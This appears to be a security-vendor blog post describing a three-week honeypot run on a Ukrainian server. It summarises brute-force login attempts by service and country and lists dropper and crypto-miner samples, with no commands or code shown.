Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Trustwave Unveils New Offerings to Maximize Value of Microsoft Security Investments. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Offensive Security
Solutions to maximize your security ROI
Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Tough Times for Ukrainian Honeypot?


We've recently been inundated with news of increased cyberattacks and a general increase in cyber threats online. Hackers - both bad and good, government related or private groups - have their hands full every day as never before and compounding the situation is the Russia-Ukraine (UA) war which has sparked a cyber storm. This made us just more curious about Internet attacks on the UA telecom infrastructure. One would expect our research to at least turn up a few attacks from Russia, but, surprisingly, that was not the case.

More honeypots!

To take a closer look at the situation, I rented a VPS server located in UA. The requirement for this research was having an IP address originating from the UA pool. Unlike my previous study A handshake with MySQL Bots, I didn't use original software (e.g. MariaDB server for MySQL service) to gather information from the given service, but I decided to use open-source honeypot projects. There are good and bad sides of this approach, but was mainly focused in taking a general overview of what, how and from where attacks are made, rather than a detailed binary analysis, etc.

The honeypot operated for three weeks, collecting information about authentication attempts on several services, mainly SSH, but also: HTTP, Telnet, VNC and SMTP - and a few more:




The main idea of SSH sensor was monitoring and logging what is happening on one of the most sensitive sites on the Internet. For this purpose, I used a project called Kippo, which perfectly pretends to be an SSH service by mimicking an operating system. Kippo allowed me to not only to see how login strings and passwords are being brute-forced, but also what happens after getting into - in this case fake - operating system.

During the three weeks it operated, the honeypot counted over 50,000 authentication attempts. The honeypot was configured to simulate a successful login every other attempt. Analyzing logs, among simple Linux commands, we mainly notice attempts to download and run droppers and miners. More info about these files on the bottom of page.



Please note the numbers 3378 and 749 at the top of each screenshot. These are the numbers of the results of the same query, but without using the DISTINCT statement. This gives us some perspective on the real number of download attempts.

Only part of the addresses listed above were active. The samples that I initially analyzed turned out to be mostly part of the well-known Mirai botnet.

The top 20 most encountered passwords and usernames used during a brute-force attack are listed below.



And the number of connections made from single IP along with GeoIP information:



Albania and Vietnam top the list.

To monitor other services, I used the heralding project, which logs only login credentials and connection data. This honeypot collected information for two weeks. For the following services, I focused mainly on GeoIP information.

The numbers of authentication attempts for each service:




Telnet, the archaic terminal connection is still quite popular - at least among attacking bots. Let's look at the collected data.

Top 20 login names:



The number of connections made from a single IP along with GeoIP information: 



China noticeably on the lead.

Virtual Network Computing (VNC)

We might think that Virtual Network Computing would not find many users today, but it turns out that VNC still has many followers. According to Shodan, there are more than 320,000 devices on the Internet with recognized VNC service, and more than 1 million devices with open port 5900/TCP. These numbers alone justify the bots activity.



We found only two active sources of attacks: Poland (7042 brute-force attempts) and Kazakhstan (62 brute-force attempts).


Attacks on the mail transport protocol wasn't very heavy with just 14 unique addresses counted.



Netherlands and Lithuanian attack activity on the top.


The honeypot wasn't able to collect any information about HTTPS activity, most likely because of self-signed certificate and the lack of related domain.

There were so few authentication attempts that I limited the results to just 10 in order to illustrate the activity.



Authentication attempts on the other services were so few that we can easily leave them out of the conclusions.





1sh / 2sh

Simple dropper script

36a5b9303d671f49e404791d53d1d96c /

Simple dropper script (multi-architecture targets)


Simple dropper script (multi-architecture targets)


Simple dropper script


Simple dropper script (multi-architecture targets)


Simple dropper script (multi-architecture targets)


Simple dropper script (multi-architecture targets)


Simple dropper script (multi-architecture targets)











Crypto-miner dropper


Crypto-miner dropper







Have tough times come for the Ukrainian Honeypot? Well, on this particular one, not really.

We didn't notice any IP coming from Russia. In fact, much of the exploitation we saw could have occurred regardless of the geography the honeypot was installed in.

There could be many reasons for this. Our first thought is elite hacking groups don't necessarily pounce on a newly emerging server on the Internet. Instead, these groups have set targets on which they focus their time and energy. What our honeypot experiment did prove was that bots still function, in their usual fashion. Lazily attacking everything they can connect to on the Internet. Additionally, we found that brute-force attacks are constantly a threat to poorly managed infrastructures, servers, and IoT devices.

Latest SpiderLabs Blogs

Secure Access Service Edge: Another Multi-Tool for the SOC

Over the years, several security defense architectures have merged into a single solution. Endpoint detection tools can perform sophisticated detections and correlations that used to require a...

Read More

Search & Spoof: Abuse of Windows Search to Redirect to Malware

Trustwave SpiderLabs has detected a sophisticated malware campaign that leverages the Windows search functionality embedded in HTML code to deploy malware. We found the threat actors utilizing a...

Read More

The Sentinel’s Watch: Building a Security Reporting Framework

Imagine being on shift as the guard of a fortress. Your job is to identify threats as they approach the perimeter. The more methods you have for detecting those threats, the better your chances of...

Read More